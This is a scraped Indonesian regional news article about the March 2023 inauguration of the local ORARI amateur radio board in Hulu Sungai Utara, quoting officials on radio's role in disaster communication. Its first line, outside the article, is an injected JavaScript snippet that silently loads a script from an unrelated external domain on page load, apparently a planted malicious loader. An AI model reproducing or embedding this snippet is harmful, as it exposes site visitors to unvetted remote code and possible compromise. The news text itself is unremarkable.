(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Hadiri Pelantikan Pengurus ORARI Lokal HSU, Pj Bupati Pesankan Ini


KANALKALIMANTAN.COM, AMUNTAI – Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Raden Suria Fadliansyah, mengakui sebagai organisasi radio amatir, ORARI berperan penting sebagai media informasi dan komunikasi. Terutama di saat-saat darurat bencana.

Hal itu seperti diungkapkannya saat menghadiri pelantikan pengurus Lokal ORARI Hulu Sungai Utara masa bakti 2023-2027 yang digelar di Gedung Agung Lantai II, Minggu (12/3/2023).

“Kami yakin dan kami percaya bahwa kehadiran organisasi ini adalah sebuah jaringan komunikasi yang penting, terutama sekali kawan-kawan yang di kebencanaan, kebetulan saya Kepala Penanggulangan Bencana di provinsi,” kata Pj Bupati HSU.

Lebih lanjut, menurutnya ORARI merupakan sebuah jembatan bagi pemerintah daerah untuk mempromosi kondisi alam, dan potensi-potensi apa yang ada di kabupaten masing-masing.

 

Baca juga: Pemecahan Rekor Menjelujur Kain Sasirangan Diapresiasi Kemenparekraf RI

“Dengan ORARI kita dapat saling tukar menukar informasi, tidak hanya soal kebencanaan, tapi semua pembangunan yang ada di kabupaten ini, kita berharap melalui ORARI dapat membuka pintu jendela dunia,” imbuhnya.

Selain itu, diakuinya ORARI juga merupakan pioner dan pelopor utama untuk membantu masyarakat ke arah lebih baik.

“Saya berharap dengan dilantiknya kepengurusan ini, mari kita sama-sama membangun Kabupaten Hulu Sungai Utara, dan kita berharap kawan-kawan ikut berpartisipasi sekecil apapun yang lakukan itu berarti untuk masyarakat Kabupaten Hulu Sungai Utara,” tutupnya.

Hal senada juga diungkapkan Ketua ORARI Daerah Kalimantan Selatan melalui staf khusus bidang hukum dan advokasi, Bambang Supria, yang menyampaikan ucapan selamat kepada seluruh pengurus yang baru dilantik.

“Kami berharap pengurus terpilih dapat bekerja dengan semangat mengelola organisasi ini bersama-sama dan melaksanakan kebijaksanaan umum hasil musyawarah lokal, maupun program dan kegiatan yang telah direncanakan dengan sebaik-baiknya agar orari lokal hulu Sungai Utara semakin maju dan jaya,” tukasnya.

Baca juga: Forum Puspa Kapuas Dikukuhkan, Ini Kata Wakil Rakyat

Sementara itu, Ketua ORARI Lokal HSU Budiansyah mengucapkan terima kasih kepada pemerintah daerah Kabupaten HSU yang selama ini mendukung dan membantu ORARI lokal HSU.

“Alhamdulillah selama ini ori lokal dengan pemerintah daerah terjadi hubungan yang baik, dengan kerjasama selama ini kita bisa membantu pemerintah daerah melalui bantuan komunikasi baik dalam bantuan komunikasi kebencanaan alam seperti banjir kebakaran dan lain-lain, selain itu orari lokal juga membantu memperkenalkan wisata-wisata di daerah Hulu Sungai Utara,” tutupnya.

Adapun acara tersebut juga di barengi dengan kegiatan silaturahmi yang dihadiri oleh anggota Orari se-Kalsel dan Kalteng dengan berbagai macam kegiatan dan hiburan.(kanalkalimantan.com/dew)

Reporter: dew
Editor: cell


Al Ghifari

Recent Posts

Tingkatkan Capaian Akses Layanan Air Limbah dan Air Minum, Dinas PUPR Kalsel Gelar Workshop

KANALKALIMANTAN.COM, BANJARBARU - Workshop Implementasi Jastrada Air Minum Provinsi Kalsel tahun 2024 di Banjarmasin digelar… Read More

15 jam ago

Ikuti Festival Tunas Bahasa Ibu Nasional di jakarta, Murid SDN Indrasari 2 Audiensi ke Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Murid kelas 5 SDN Indrasari 2 Martapura, M Royan bersama guru dan… Read More

15 jam ago

Kafilah HSU Berangkat ke MTQ ke-35 Tingkat Provinsi Kalsel 2024

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan resmi melepas kafilah… Read More

16 jam ago

Pj Bupati HSU Pimpinan Apel Peringatan Hari Otonomi Daerah

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara (HSU) menggelar apel peringatan Hari Otonomi Daerah… Read More

17 jam ago

Polresta Banjarmasin Tengah Selidiki Kasus Bayi Meninggal Saat Persalinan

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian dari Satuan Reserse Kriminal (Satreskrim) Polresta Banjarmasin Tengah melakukan penyelidikan proses… Read More

18 jam ago

Rekrutmen PPK Pilkada 2024 Dibuka! Ini Jadwal, Syarat, Cara Daftar dan Gajinya

KANALKALIMANTAN.COM - Komisi Pemilihan Umum (KPU) membuka perekrutan Panitia Pemilihan Kecamatan (PPK) Pemilihan Kepala Daerah… Read More

21 jam ago

This website uses cookies.